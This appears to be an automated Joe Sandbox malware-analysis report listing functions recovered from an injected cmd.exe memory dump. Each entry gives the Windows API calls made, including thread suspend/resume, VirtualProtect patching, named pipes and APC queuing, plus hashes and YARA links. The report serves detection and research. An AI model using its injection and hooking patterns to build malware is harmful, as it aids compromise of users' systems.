Function 0302E958 Relevance: 6.1, APIs: 4, Instructions: 108threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0302E986
ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0302EA10
WaitForSingleObject.KERNEL32(00000064), ref: 0302EA1E
SuspendThread.KERNEL32(?), ref: 0302EA31

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: eb2c7e841247752deede33a10a17ca5db25e25cc9b8c7c71ccd6c2c59c5d0ddb
Instruction ID: 869cc96f18d05bf4a7c76ba5e05232ceccba6fce39548ff9f029bbdd6d7a8ac7
Opcode Fuzzy Hash: eb2c7e841247752deede33a10a17ca5db25e25cc9b8c7c71ccd6c2c59c5d0ddb
Instruction Fuzzy Hash: 9941AD76109301AFE721EF54CC80EABBBEAFF88300F04492DF694961A0D732E914CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0303BD42 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 030297AB: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 030297B9

RtlAllocateHeap.NTDLL(00000000,?), ref: 0303BDAA
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0303BDFB

Part of subcall function 03025697: GetLastError.KERNEL32(?,00000080,00000000), ref: 030256E1
Part of subcall function 03025697: WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 03025706
Part of subcall function 03025697: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 03025751
Part of subcall function 03025697: WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 03025766
Part of subcall function 03025697: SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 03025773
Part of subcall function 03025697: CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0302578B

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,03037621,?,?,?,?,?,?), ref: 0303BE30
HeapFree.KERNEL32(00000000,?,?,?,?,03037621,?,?,?,?,?,?,00000000,?,00000000), ref: 0303BE40

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FileHeap$AllocateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 2457821452-0
Opcode ID: a3d6e7c2abe3e2b961f21809bbbc26545bad80f819dce8c25685c45cabeb10f7
Instruction ID: c385f8d57b4bd8cd75a6f798903f14d4569be0904ab40323ad80ddf4bb058e5a
Opcode Fuzzy Hash: a3d6e7c2abe3e2b961f21809bbbc26545bad80f819dce8c25685c45cabeb10f7
Instruction Fuzzy Hash: 6B3189BA502119FFEB10EFA4DD88CAEBBBDFF09240B144165F604D3124D771AE519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 030252EC Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03025328
HeapFree.KERNEL32(00000000,00000000,?,03030AD3,?,?), ref: 03025345
memcpy.NTDLL(?,?,03030AD3,?,03030AD3,?,?), ref: 03025366

Strings

chun, xrefs: 030253E2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FreeHeapmemcpymemset
String ID: chun
API String ID: 2272576838-3058818181
Opcode ID: 5fb035de2e622cb393f15b5216febed3290172492f1bf6685c5c20260b9512cb
Instruction ID: 8c623c6fb1a1d08d5c85ea0f5f0a0b0ce509317000b6ca4d4cd8d22f6bed7c8e
Opcode Fuzzy Hash: 5fb035de2e622cb393f15b5216febed3290172492f1bf6685c5c20260b9512cb
Instruction Fuzzy Hash: A031CDB9102711AFE730DF69DC40E56FBECEF46214B04892AE949CB220D770EA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0303FA00 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,00000000), ref: 0303FA17
SetEvent.KERNEL32(?), ref: 0303FA27
GetLastError.KERNEL32 ref: 0303FAB0

Part of subcall function 0303216A: WaitForMultipleObjects.KERNEL32(00000002,00000008,00000000,00000008,?,?,?,03041C2A,0000EA60,?,?,?,03029F89,?,00000000,00000001), ref: 03032185

Part of subcall function 0304020F: RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

GetLastError.KERNEL32(00000000), ref: 0303FAE5

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 17237400336cee995014dcde7fee6eb3480da848c462d09da28f371a92a74ebd
Instruction ID: 8dacbe451d1c0337c242bfddb1dc5f591a74c01a4382792e81b7b76a4dfdadab
Opcode Fuzzy Hash: 17237400336cee995014dcde7fee6eb3480da848c462d09da28f371a92a74ebd
Instruction Fuzzy Hash: AD3140F9D01709EFDB20EFA4CD8499EB7FCEB09700F1449AAE542A6140D7749A449F10

Uniqueness

Uniqueness Score: -1.00%

Function 0303C9FC Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0303CA55
memcpy.NTDLL(00000018,?,?), ref: 0303CA7E
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00015B31,00000000,000000FF,00000008), ref: 0303CABD
HeapFree.KERNEL32(00000000,00000000), ref: 0303CAD0

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: b62cf0b7d740280d819dfc3df557365ad9d09f8ac97551f5c335caaa3d00f7a2
Instruction ID: e403ee64c08b326a93e62a4661df0d682350b395499f127430b5bbb7c0279f68
Opcode Fuzzy Hash: b62cf0b7d740280d819dfc3df557365ad9d09f8ac97551f5c335caaa3d00f7a2
Instruction Fuzzy Hash: BC31A5B4202705AFDB20DF29DC44F9A7BACFF05720F148619F965D62A0D775EA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303DF1B Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03024EC7: memcpy.NTDLL(00000000,00000110,?,?,00000000,?,?,?,00000000), ref: 03024EFD
Part of subcall function 03024EC7: memset.NTDLL ref: 03024F73
Part of subcall function 03024EC7: memset.NTDLL ref: 03024F87

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0303DF73
lstrcmpi.KERNEL32(00000000,?), ref: 0303DF9A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0303DFDF
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0303DFF0

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: 9215574e14f151275434f82bdb41efcd8d4372b1f2f1bff8a8cc4849e3b49961
Instruction ID: 3f72aee7c7949d3b51d224511c147950d42c4398a517be3f34cc225abe151a6e
Opcode Fuzzy Hash: 9215574e14f151275434f82bdb41efcd8d4372b1f2f1bff8a8cc4849e3b49961
Instruction Fuzzy Hash: FD21A0B9602209FFDF50EFA4DD84EAEBBBDEB45304F048461F905AA224D7359A15DB10

Uniqueness

Uniqueness Score: -1.00%

Function 03040D82 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 030409B1: StrChrA.SHLWAPI(?,0000000D,?,0303B876,00000000,?,?), ref: 030409FB

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03040DEB
memcpy.NTDLL(00000000,?,00000007,?,?,?,03030B59,00000000), ref: 03040E18
memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,03030B59,00000000), ref: 03040E27
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,03030B59,00000000), ref: 03040E39

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memcpy$AllocateHeap
String ID:
API String ID: 4068229299-0
Opcode ID: 9e45e81b237023b2df3f1875c195a3635e489740d24228016f1657cb7dfa7eba
Instruction ID: b5f0380a978f817dccf53a1075fd8ab835f4cb41b66937c00c28128e9265f765
Opcode Fuzzy Hash: 9e45e81b237023b2df3f1875c195a3635e489740d24228016f1657cb7dfa7eba
Instruction Fuzzy Hash: 012190B6502209BFDB11DF99DC84F9AB7ECEF48644F048162FA08DB251D774EB548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303E16E Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0303E19D
lstrlen.KERNEL32(03023911), ref: 0303E1AE

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

strcpy.NTDLL ref: 0303E1C5
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0303E1CF

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: 1cf8580b103f3d9b3f3ace8ca086e466aee2ffb15ca9eadc64773741eb74d1d0
Instruction ID: 0b00a8b63e79d6b4da387ed41f7b0853af38dd2c8f702c1501d6f623bfb6b7ed
Opcode Fuzzy Hash: 1cf8580b103f3d9b3f3ace8ca086e466aee2ffb15ca9eadc64773741eb74d1d0
Instruction Fuzzy Hash: C121D4BB106301AFE320AB74EC49F6AB7FCEF46710F048A19F96686281EB74D900C751

Uniqueness

Uniqueness Score: -1.00%

Function 03031884 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 030318A6
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 030318EA
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0303192D
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 03031950

Part of subcall function 0302F425: GetTickCount.KERNEL32 ref: 0302F435
Part of subcall function 0302F425: CreateFileW.KERNEL32(0303A5EC,80000000,00000003,03048208,00000003,00000000,00000000,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F452
Part of subcall function 0302F425: GetFileSize.KERNEL32(0303A5EC,00000000,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F485
Part of subcall function 0302F425: CreateFileMappingA.KERNEL32(0303A5EC,03048208,00000002,00000000,00000000,0303A5EC), ref: 0302F499
Part of subcall function 0302F425: lstrlen.KERNEL32(0303A5EC,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F4B5
Part of subcall function 0302F425: lstrcpy.KERNEL32(?,0303A5EC), ref: 0302F4C5
Part of subcall function 0302F425: HeapFree.KERNEL32(00000000,0303A5EC,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F4E0
Part of subcall function 0302F425: CloseHandle.KERNEL32(0303A5EC,?,0303A5EC), ref: 0302F4F2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 3b0588d569c9895f232990f43ce121699c709bbed3e720976feb17ddbed25bd8
Instruction ID: 1a0cc47036bd3bb84cedba9bfd2eb1f01014c9eb0def3e7eea2d49c75e7acb67
Opcode Fuzzy Hash: 3b0588d569c9895f232990f43ce121699c709bbed3e720976feb17ddbed25bd8
Instruction Fuzzy Hash: F2217A75902309EBDF25EF66DD04EEEBBBDEF8A350F140126F916A2160DB308546CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302E136 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0302E186
GetLastError.KERNEL32 ref: 0302E1B7
HeapFree.KERNEL32(00000000,?), ref: 0302E1C9
HeapFree.KERNEL32(00000000,?), ref: 0302E1DE

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$AllocateErrorLast
String ID:
API String ID: 3560806655-0
Opcode ID: fe60ce212dad220fdebfe0cb982997292b4a4b40504549dbfb1c7e373b04564e
Instruction ID: 1be51f616efe91345e60198161e616233cc18fdcbb23d05c83f684425c34be22
Opcode Fuzzy Hash: fe60ce212dad220fdebfe0cb982997292b4a4b40504549dbfb1c7e373b04564e
Instruction Fuzzy Hash: 901181BA542128FBCF22ABA5DD48CEFBF7EFF45390B044461F905A1054C7354A61EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0302EAF9 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0303D0F7: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0302EB10), ref: 0303D11D

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0302EB4B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,03022A85,?), ref: 0302EB5D
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,03022A85,?), ref: 0302EB75
CloseHandle.KERNEL32(?,?,?,?,?,?,03022A85,?), ref: 0302EB90

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: b6df45541012543504116549f562c72dea5a168fd38bd2fa5020d455b764eee0
Instruction ID: e627cc6b173d2cbf59da05ede3cb58acd1de4e242afdc792ff5d7b62cf98b9a9
Opcode Fuzzy Hash: b6df45541012543504116549f562c72dea5a168fd38bd2fa5020d455b764eee0
Instruction Fuzzy Hash: 66118EB4903228BBDB21EEA5CC88EEFBEBDEF42660F144151F605E5154D3308A50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303586B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,03025124,?), ref: 030358A3

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

lstrcpy.KERNEL32(00000000,?), ref: 030358BA
StrChrA.SHLWAPI(00000000,0000002E), ref: 030358C3
GetModuleHandleA.KERNEL32(00000000), ref: 030358E1

Part of subcall function 03036924: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000001,00000000,00000004,03043050,?,80000000), ref: 030369FC
Part of subcall function 03036924: VirtualProtect.KERNEL32(00000006,00000004,03043050,03043050,?,00000001,00000000,00000004,03043050,?,80000000,00000000,?,030440B0,0000001C,03030691), ref: 03036A17
Part of subcall function 03036924: RtlEnterCriticalSection.NTDLL(03048420), ref: 03036A3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: a1049b50b83d2f6b67a4501458b49cb9c973c33ceae3b8ec757d0df1f4eeed82
Instruction ID: 790877855bdf8fbfe1e32ac184226acff1605fb0d11a06403d411a367d19834d
Opcode Fuzzy Hash: a1049b50b83d2f6b67a4501458b49cb9c973c33ceae3b8ec757d0df1f4eeed82
Instruction Fuzzy Hash: 00215E78902309EFCB10DF64C948BAEBBFDBF86310F14849AE4559B2A5DB74DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03030443 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,03043124,0304305C,?,?,?,0302164B,?,00000000,?), ref: 03030453

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0302164B,?,00000000,?), ref: 03030475
lstrcpyW.KERNEL32(00000000,?), ref: 030304A1
lstrcatW.KERNEL32(00000000,?), ref: 030304B4

Part of subcall function 030280B9: strstr.NTDLL ref: 030281E4

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlenstrstr
String ID:
API String ID: 330036553-0
Opcode ID: d05026739fa8c4701c5e5c220a41bc82da9b15ee0801b26db5ad542397ecebc6
Instruction ID: ba54ee7250cb8e1051fc87c858eb84e2dad8faea250cdb05a74bb0ccf515bca7
Opcode Fuzzy Hash: d05026739fa8c4701c5e5c220a41bc82da9b15ee0801b26db5ad542397ecebc6
Instruction Fuzzy Hash: 57116DBA502119BFDB11AFA4CD88CDFBFADEF46250B008064F905A6110D735DB51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03038B2F Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03035794,00000000,?,030430F0,0303C5F4,00000000,030483CC), ref: 03038B3A
RtlAllocateHeap.NTDLL(00000000,?), ref: 03038B52
memcpy.NTDLL(00000000,?,-00000008,?,?,?,03035794,00000000,?,030430F0,0303C5F4,00000000,030483CC), ref: 03038B96
memcpy.NTDLL(00000001,?,00000001), ref: 03038BB7

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 77a6f5c77bc900b51af5f025d388c5d48d5137a46b5a13cf4c758378de21b2e4
Instruction ID: caf8510f45afaa8bd0a7b156ce7867a1d0ac63025016296143b4a4e01f110fcf
Opcode Fuzzy Hash: 77a6f5c77bc900b51af5f025d388c5d48d5137a46b5a13cf4c758378de21b2e4
Instruction Fuzzy Hash: 061148BAA01215BFC310DB69ED84D9EBBEEDBC1260B0882B7F504D7250E7759F0487A0

Uniqueness

Uniqueness Score: -1.00%

Function 0303E52A Relevance: 6.1, APIs: 4, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

GetCurrentThreadId.KERNEL32 ref: 0303E562
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
lstrcpy.KERNEL32(00000000), ref: 0303E59E

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FileTime$AllocateCurrentHeapNameSystemTempThreadlstrcpy
String ID:
API String ID: 282257550-0
Opcode ID: 8c533d159331b5df54f05350c74616ecfa235148c008aa8667fef8c4011b68ce
Instruction ID: b53e14af50d93933ab7859b439646f681ebf0e56fcade73f90089b642c63d163
Opcode Fuzzy Hash: 8c533d159331b5df54f05350c74616ecfa235148c008aa8667fef8c4011b68ce
Instruction Fuzzy Hash: CC0184BB9032156FDB21ABA5DD48DABBBBC9FC6A407090275BA01D7104EF64DA11C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 03028922 Relevance: 6.1, APIs: 4, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,00000008,03023B81), ref: 0302892C

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00000008,03023B81), ref: 03028957
StrStrA.SHLWAPI(00000000,?,?,00000003,?,?,00000008,03023B81), ref: 03028976
lstrcat.KERNEL32(00000000,?), ref: 030289AE

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrlen
String ID:
API String ID: 745444535-0
Opcode ID: 9597ac6e56698e52fb43708a1e0d731d70b97532be0b0e57e4d7123035e80f82
Instruction ID: b580dfa445dc024fe8334ace15ca8a9d8b951d2f6a0ef1535a27148c708a4f2e
Opcode Fuzzy Hash: 9597ac6e56698e52fb43708a1e0d731d70b97532be0b0e57e4d7123035e80f82
Instruction Fuzzy Hash: 5411E3BE1022129BD320DB66ED88E7BBBECABC5605F0C852DFA44C2104EB34D505C722

Uniqueness

Uniqueness Score: -1.00%

Function 030402E3 Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0303A939,00000000,00000000), ref: 030402F6
lstrlen.KERNEL32(030480DC,?,?,?,0303A939,00000000,00000000), ref: 03040317
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0304032F
lstrcpy.KERNEL32(00000000,030480DC), ref: 03040341

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 7e8f9097a213cfa58deed8c9782a3dd05425c3ffac925b27aaa9f1f57cfbbd56
Instruction ID: e7e9a4d2cf9430b875f454fda4c5c9a8036a4e8b4887cb1e75460a35b8266c01
Opcode Fuzzy Hash: 7e8f9097a213cfa58deed8c9782a3dd05425c3ffac925b27aaa9f1f57cfbbd56
Instruction Fuzzy Hash: 8C01C8FA901244BFC711EBE8A984A5EFFFCAB88201F1445A9EA45E3205D7349B04C765

Uniqueness

Uniqueness Score: -1.00%

Function 030374BB Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 030374C8
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 030374EE
lstrcpy.KERNEL32(00000014,?), ref: 03037513
memcpy.NTDLL(?,?,?), ref: 03037520

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 7f8032c6260fa7590e01fe7cae5f519d5c4ac5e9049f1c39e843c83fc984df1a
Instruction ID: 4da7c58a3c7d665a03a06e60d8cfc79e096487ee2df42fa0a75ad73cf31ae7dd
Opcode Fuzzy Hash: 7f8032c6260fa7590e01fe7cae5f519d5c4ac5e9049f1c39e843c83fc984df1a
Instruction Fuzzy Hash: 5E115BB550120AEFC721DF58E984E9ABBF8FF49704F14855EF88A87210D775EA14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03029C6A Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03048448), ref: 03029C75
Sleep.KERNEL32(0000000A,?,?,03030B38,00000000), ref: 03029C7F
SetEvent.KERNEL32(?,?,03030B38), ref: 03029CD6
RtlLeaveCriticalSection.NTDLL(03048448), ref: 03029CF5

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: db5acea99e80eff02cde486923297d8293d76054cdac9cf4bbb15b18bb7dd8f6
Instruction ID: 178db0c5c45e209ea0e9561f44854f0516afe7fe477e465af85182b27e750153
Opcode Fuzzy Hash: db5acea99e80eff02cde486923297d8293d76054cdac9cf4bbb15b18bb7dd8f6
Instruction Fuzzy Hash: A10196F8642314BFE710FB64DE49B563AECFB05701F104852F615E6084E7B99B10CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0303A07D Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 030240F1: lstrlen.KERNEL32(?,03047D10,00000000,0303A093,03047D10,?,03047CC0,?,?,0302DBD6,?,00000015,00003219), ref: 030240F6
Part of subcall function 030240F1: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0302410B
Part of subcall function 030240F1: wsprintfA.USER32 ref: 03024127
Part of subcall function 030240F1: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03024143

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,03047D10,?,03047CC0,?,?,0302DBD6,?,00000015,00003219), ref: 0303A0AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0302DBD6,?,00000015,00003219), ref: 0303A0BA
CloseHandle.KERNEL32(00000000,?,?,0302DBD6,?,00000015,00003219), ref: 0303A0C4
GetLastError.KERNEL32(?,?,0302DBD6,?,00000015,00003219), ref: 0303A0CC

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: ef3daee2770796d193d2d8bd1402a2eea4f59a04da145e2e5deccfc8d44e447f
Instruction ID: 42399eb927cd9cd01aa59f85fd9dc24c34f95c8d00b0ac2759bde2e8498652fb
Opcode Fuzzy Hash: ef3daee2770796d193d2d8bd1402a2eea4f59a04da145e2e5deccfc8d44e447f
Instruction Fuzzy Hash: 6BF0A979207214BBD331AA69DC89EDFBE5CEF46760F108615F58995080C7345655C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0303D4C8 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,03048208,00000001), ref: 0303D4EC
GetLastError.KERNEL32(?,00000000,?,?,0302DA8B,?,?,?), ref: 0303D537

Part of subcall function 03032DF0: CreateThread.KERNEL32(00000000,00000000,00000000,?,03048194,0302678D), ref: 03032E07
Part of subcall function 03032DF0: QueueUserAPC.KERNEL32(?,00000000,?), ref: 03032E1C
Part of subcall function 03032DF0: GetLastError.KERNEL32(00000000), ref: 03032E27
Part of subcall function 03032DF0: TerminateThread.KERNEL32(00000000,00000000), ref: 03032E31
Part of subcall function 03032DF0: CloseHandle.KERNEL32(00000000), ref: 03032E38
